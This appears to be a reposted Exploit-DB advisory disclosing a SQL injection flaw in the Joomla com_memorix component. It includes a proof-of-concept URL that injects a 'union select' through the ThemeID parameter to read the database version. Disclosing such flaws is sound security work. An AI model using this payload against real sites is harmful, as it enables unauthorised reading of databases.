Joomla! Component com_memorix – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Omar
  日期： 2015-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37773/

• # Exploit Title: Joomla com_memorix component SQL Injection vulnerability
  # Date: 13-08-2015
  # Software Link: N/A
  # Exploit Author: Omar AbuHassan
  # Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
  # CVE: N/A
  # Category: webapps
  # Version: All
  # Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
   
  1. Description
   
  Normal user can inject sql query in the url which lead to read data from the database.
   
  2. Proof of Concept
  
  http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI)
  
  Injected column is # 3
  
  http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,version(),444,555,666,777,888,999--+AbuHassan
  
  ** No solution yet from vendor **
  
  #######################
  # Greets to Palestine #
  #######################